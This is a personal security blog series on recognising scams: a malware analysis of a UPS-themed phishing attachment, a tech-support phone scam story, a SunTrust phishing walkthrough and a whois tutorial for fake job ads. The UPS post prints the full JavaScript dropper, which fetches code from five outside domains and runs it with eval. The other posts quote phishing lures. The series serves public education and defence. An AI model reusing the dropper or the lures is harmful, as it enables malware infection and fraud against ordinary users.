Hacker Mitigation

Hacker Mitigation

This is a series dedicated to insuring that hackers and phishers can do no harm to your computer or your finances. Computer security basics will not be covered in this series.

We shall differentiate between two species of attacker as follows:

In the following, examples are given along with possible mitigation strategies, so that you can stay a Happy Kitty in all of your online endeavors.

AlReaud Tue, 09/27/2011 - 19:03
Tags

Analysis and Takeapart of a UPS Parcel Shipping Problem Spoof

Analysis and Takeapart of a UPS Parcel Shipping Problem Spoof

At least once a week I get attachments from a “reputable” organization saying my account (that I don't have) has been locked due to suspicious activity being detected, a bank account (that I don't have) needs verification, or there is a problem with the shipment of a parcel (I didn't order). This week I got an interesting one from "Jordan Mccabe, UPS Station Manager". Sadly the sending individual doesn't know enough about the target to realize that "UPS" and "Post Office", well, kind of mismatch. But this one got me interested in doing some reverse engineering of the suspicious attachment because of it's small size, only 817 bytes.

The text of the email is as follows:
Date: 02/26/2017 01:35 AM
From: virtual-user <webmaster@lippocastano.it>
Subject: Parcel #001210497 shipment problem, please review
To: Me
Body:

Dear Customer,
Your item has arrived at the UPS Post Office at February 25, but the courier was unable to deliver parcel to you.
Postal label is enclosed to this e-mail. Please check the attachment!
Yours sincerely,
Jordan Mccabe,
UPS Station Manager.

Attachment: UPS-Parcel-ID-001210497.zip
Attachment Checksum (MD5): 3e01923b9fd179c864bf40caffb21786

Screen capture of UPS Trojan Attachment Email showing highlights.

The highlighted areas indicate areas that commonly give away the fact that it is a spoof. Usually the sender address is strange or wrong, the grammar is wrong, and the context of the message is wrong.

Unzipping the attachments creates a second zip file with a .doc.zip extension (Microsoft Word Document.Compressed File) that is 694 bytes long. Most Windows installations will show this as .doc file rather than as it's true extension which is a .zip file.
Unzipped Attachment: UPS-Parcel-ID-001210497.doc.zip
Unzipped Attachment Checksum (MD5): 6a6d2e478e7a2b0259f1fcc333e7cde3

My interpretation is that if one were to double click on that file in a File Explorer window, Windows would actually extract the compressed file and try to execute it with the proper software. But we are doing this on Ubuntu 16.04, so we have to do it manually and make some assumptions that may not be valid. We'll get to that later…

Unzipping the compressed document file gives a third file with a .doc.js extension (Microsoft Word Document.JavaScript Source) that is, again, 817 bytes long. I believe that this JavaScript file would then be executed by the default browser on the system, which would normally be Microsoft Internet Explorer or, now, Microsoft Edge.
Unzipped Document File: UPS-Parcel-ID-001210497.doc.js
Unzipped Document File Checksum (MD5): f1bce6d06683909f54cefd27490c097d

The content of this JavaScript installer is as follows. It is simply encoded in an attempt to defeat malware scanners. For simplicity I've removed blank lines:

  1. var sder = "P";
  2. var g2 = "M"+"sxml2.XMLHT"+""+"T"+""+sder;
  3. var m = "rWsE9ZXQhmXt5qxjCNca4Tq-BPesvEn4nxd0LQzxeVXfY-N-QdlpNfbwmn7_EZjSl61XGNgm";
  4. var x = new Array("ronniespersonaltouchjanitorialservice.com", "lasvegasmaps.net", "fitnessdigezt.com", "lovingfloridalife.com", "gestionysuministros.com");
  5. var t4 = "ht"+"tp";
  6. var mul = "qwadro";
  7. var ter = "/";
  8. for (var i=0; i<x.length; i++)
  9. {   
  10.     var vDJmB = function(){
  11.         return new ActiveXObject(g2);
  12.     }();
  13.     var e = vDJmB;
  14.     try
  15.     {       
  16.         var guama=["\x6F\x70\x65\x6E"];e[guama[0]]("G"+""+"E"+"T", t4 + ":"+ter+ter+x[i]+"/c"+"o"+"unter/?"+m,false)       
  17.         e.send();
  18.         var r = e.responseText;
  19.         if (r.length > 999+1 && r.indexOf(m) > -1)
  20.         {
  21.             eval(e.responseText.split(m).join(mul.substring(2,3)));
  22.             break;
  23.         };
  24.     }
  25.     catch(e)
  26.     {
  27.     };
  28. };

 

The JavaScript goes out to five websites and downloads encoded preliminary payloads that are using something similar to steganography for obfuscation purposes. After configuring variables, the script creates an ActiveX object, vDJmB (line 10), assigns it to a variable, e (line 13), then tries to open the ActiveX object with the parameters shown in (line 16). The five sites listed for this version are in array variable x (line 4), and the key is in variable m (line 3). If successful, the script assigns the response to a variable, r (line 18), checks it's size, and then evaluates the decoded primary payload (line 21), which is also JavaScript.

TO BE CONTINUED…

AlReaud Tue, 02/28/2017 - 19:26

Beware the www.support.me phone scam...

Beware the www.support.me phone scam...

I got a call from (212) 877-1620, which is a Verizon New York number on Friday, February 24 2017. This number had been trying to reach me almost daily since February 14. Must have been an important call if they are doing that, so I answered. The guy on the other line was from a "Microsoft Certified support provider" (Right frown) who wanted to let me know that they had detected my Windows computer putting out malware. Really? Which computer? I have four computers up and running. Oh, the one you are on now. That's pretty interesting, I told him, the computer was powered down. Oh, we have logs of it he said. He had one of those Mumbai British accents that lets the cat jump right out of the bag, if you know what I mean…

The truth of the matter is that I have ZERO computers that have Windows on them, I only run versions of Linux. wink So I started feeding him line and slowly reeling him in. I was able to troll him for about 17 minutes (You want to keep them on the line as long as possible, as it cuts down their effectiveness). We get started right away, as he tells me it's a critical problem, and it has to be fixed right away. Sure, right! Lets try to open the command prompt running Windows-Key+R. Doesn't work. No command prompt shows up. Should I be doing a capital "R", no just Windows-Key+R. So we go through a few permutations of the opening of the command prompt in Windows. Doesn't work.

OK, could you open Internet Explorer. How? Spend a few minutes on that. No can't do that either. How about some other browser? Sure I have Firefox. Ok, that works (because I'm looking for a website address, LOL). OK, so he sends me to http://www.support.me, which immediately redirects me to https://secure.logmeinrescue.com/Customer/Code.aspx. Then he gives me a code, something like "888BCA6000C04FD7062". He was very specific about the 888, though, and I messed around with the numbers to verify that the first three digits were the important ones. Well the support code doesn't download anything, because I have a locked down browser that wouldn't run scripts and neither will the system run anything .exe because the system isn't Windows. We're at about 15 minutes into the gig now, and he's getting frustrated. He gets his supervisor on the phone, with an authoritative no-nonsense Mumbai British accent. And he's getting pissed almost immediately. After a couple more minutes, he asks me: What do you use your computer for? I use it for back-hacking. Back-hacking? Yes, I run an IT business and I hack in reverse, i.e. I go after scammers and spammers and try to penetrate and disable their systems... Oh, you're an IT guy like us, so why did I waste their time... Hangup. Because I'M NOT AN IT GUY LIKE THEM!

The gist of this is never, ever allow somebody remote access to your computer off of a cold call. The legitimate outfits will not be calling up to offer you malware removal. Especially not Microsoft. LogMeIn is a legitimate outfit, but there are individuals abusing the system, just like they do with everything else. LogMeIn gives a page: Avoiding scammers who abuse LogMeIn Rescue trial accounts as a guide to how to address the issue. Be safe, and pay attention to how the interaction begins, what is being asked, and why you need to cooperate with the caller. A request to call back is very important on your part, because usually the number that they called from is not real. They are doing a VOIP call from a sweatshop overseas, and spoofing the calling number. When I called back the number was not in service!

Safe and secure computing folks!

AlReaud Sun, 02/26/2017 - 19:48

SunTrust Spoof: Additional ways of protecting your SunTrust access

SunTrust Spoof: Additional ways of protecting your SunTrust access

Updated: 11/6/2016

This is a recent phish wherein you get the following email (allegedly) from SunTrust Bank:

Subject: Additional ways of protecting your SunTrust access
From: "Suntrust"<infor@suntrust.com>



SunTrust Online Banking Alert:

Banking with SunTrust Online is about to become even more secure!
As a valued SunTrust online customer, the security of your identity and personal account information is extremely important. We are installing Enhanced Online Security as an additional way of protecting your SunTrust access.

Enhancing Your Online Security Access will allow SunTrust banking to verify your identity from your computer anywhere you bank online. Your online account access information's would be recognized and be notified you've signed on to SunTrust online banking. This two-way process ensures that both parties are confident of each other's identity.
Every customer that uses SunTrust online banking is required to Re-activate his or her Online Security.

Click on sign in, in your Online Banking page for quick and easy process to Re-activate your Online SecurityAccess .

Sign in to Online Banking

Thanks for taking the time to learn about our upcoming plan for Enhanced Online Security - it's one more way that SunTrust Building Society online banking can make your online banking experience better. Endeavour to fill in your Memorable word correctly

© 2011 All Rights Reserve


Not too bad of a spoof, though paying careful attention to this page will immediately indicate that it is a phishing attack. Look carefully for things that give it away. It's from a US bank, right? What evidence stares you in the face yelling that it's a spoof? So assuming you clicked on the link above, where does it send you? It sends you to sign in at a spoof sign up page, imaged below (Tab label blurring has been used to give anonymity to the tools the author uses to explore phishing scams. Two tools that I use daily, though, are NoScript and Ghostery, both anti-spamming tools available for the Firefox browser. Clicking on the images below opens full size images in another page/tab.):

SunTrust Phish Login page.


If you got this far, well, the phishers now have your SunTrust Bank login information. Insure that you immediately contact your bank, follow their instructions, then if the bank hasn't already, change your password and User ID (if allowed). Continuing on, when you submit the above, you get sent to their fly trap, which is:

SunTrust Spoof form page where the get all your information.

If you complete this form and sign on, the phishers have every bit of information they need to steal your ID. This is a great social engineering attack, in that one has to be paying attention to things outside of the main focus, like the address bar.

In both spoofed SunTrust pages, the key is in the address bar, because though the page can be spoofed, the domain itself, https://www.suntrust.com, usually can't be. Does the website address start with https://? If there is no lock icon anywhere on your browser, and it doesn't say https in the address bar, are you really at your bank's website? Phishers (except in rare circumstances) can't forge the required digital certificate to spoof your bank's https address.

There is also usually subtle English language flaws in the original email. Reputed to come from a world class bank usually (but which evidences not, LOL), you will see things like:

  • © 2011 All Rights Reserve
  • your Online SecurityAccess
  • is required to Re-activate his or her Online Security.
  • …Endeavour to fill in your Memorable word correctly

So where does this lead?

The SunTrust spoof winds up leading to the followers of OBL...

Yes, to the confused followers of the long deceased Osama bin Laden… So please make sure that you pay attention to those address bars, and where you are being sent, watch the whole browser, and stay a Happy Kitty. The author will be willing to bet that the followers of OBL don't much like cats! angry

AlReaud Tue, 09/27/2011 - 19:50

Whois as a tool to prevent scamming on Craigs List Job Ads

Whois as a tool to prevent scamming on Craigs List Job Ads

To those of us that have to look for a job, Craigs List is a good tool, but with some serious identity theft risks involved. In Fort Collins, there has been a rash of fake advertisements posting for usually high-end technician/engineering jobs. Automated Guided Vehicle Technician, R & D Technician, etc. Some of these look like to-die-for jobs. You apply, send off a resume, and then you get an email, usually from a free email service, like Hotmail, Gmail, etc.:

=_.__.__=_-.=-..-.-=.-.,_-,__.,--.--
,.--_--,,_-,,_-=_---,-,._,,._,==_-_.---=
.=_===__.,=_,-,,_=,=-.,_,--=_.-_,.-


Hello Alfred,

Thank you for your interest in the position we have open. In order to be considered, candidates must meet the following criteria:

- Provide last 18 months work history
- Include two references
- Be willing to complete a standard 2 week training period
- Complete an IQ test, which is located here:
http://iqtestiq.com/.

The test takes approximately 10 minutes to complete. Be sure to include your phone number after you complete the test in order to track your score and for contact purposes. Applicants scoring within a specified range will be contacted by telephone to schedule an interview within 24 hours of completion by one of our managers. Test information is strictly prohibited from being shared with any second parties. It is important to us that your information is kept confidential and exempt from disclosure.

Note: Applicants who do not complete the test will not be considered for the position due to the high volume of inquiries we receive.

Thank you again for your interest.

Sincerely,
Isabel

-_,.-.,,=,,.,-__.,-,_.,==--=,.__-=__.
_._-_,..=.--,,=..=_.-==..-=.,.=,==.__
-,,,=-,=.-,=.--_,_-.---.=_,_..-=

So what do you do here? The first thing I recommend doing, before anything else, is check out where the domain linked above is. Are they in the US? If not, it's a good chance it's a phishing scam. Real employers have real websites, with real phone/fax numbers you can dial.

How can you check out where this domain is? Using a tool called whois. Whois is available online, and if you have a Linux distro, it comes installed. An example of the command line version of whois for the above shows:

[me@HCTMAIN ~]$ whois iqtestiq.com
[Querying whois.verisign-grs.com]
[Redirected to whois.enom.com]
[Querying whois.enom.com]
[whois.enom.com]
=-=-=-=
Visit AboutUs.org for more information about iqtestiq.com
<a href="http://www.aboutus.org/iqtestiq.com">AboutUs: iqtestiq.com</a>

Registration Service Provided By: Ruler-Domains
Contact: support@ruler-domains.com
Domain name: iqtestiq.com

Registrant Contact:  
   Evgraf Komissarov ()  
   Fax:
   Lenin ave 2/12
   Moscow,  26809
   RU

Administrative Contact:  
   Evgraf Komissarov (EvgrafKomissarov@bk.ru)
   +1.1366863304
   Fax:
   Lenin ave 2/12
   Moscow,  26809
   RU

Technical Contact:  
   Evgraf Komissarov (EvgrafKomissarov@bk.ru)
   +1.1366863304
   Fax:
   Lenin ave 2/12
   Moscow,  26809
   RU

Status: Locked
Name Servers:
   ns1.iqtestiq.com
   ns2.iqtestiq.com
   
Creation date: 02 Feb 2011 08:30:00
Expiration date: 02 Feb 2012 03:30:00

The question to you is, do you want to be sending your personal information off to Russia, China, the Philippines, etc? Do you really? No you don't, and neither do you want anybody else to. So if you find these, please report them as violating the Craigs List Terms of Use by clicking on the Prohibited link on the job advertisement.

So Always CHECK FIRST and be a Happy Kitty!

AlReaud Tue, 06/14/2011 - 19:30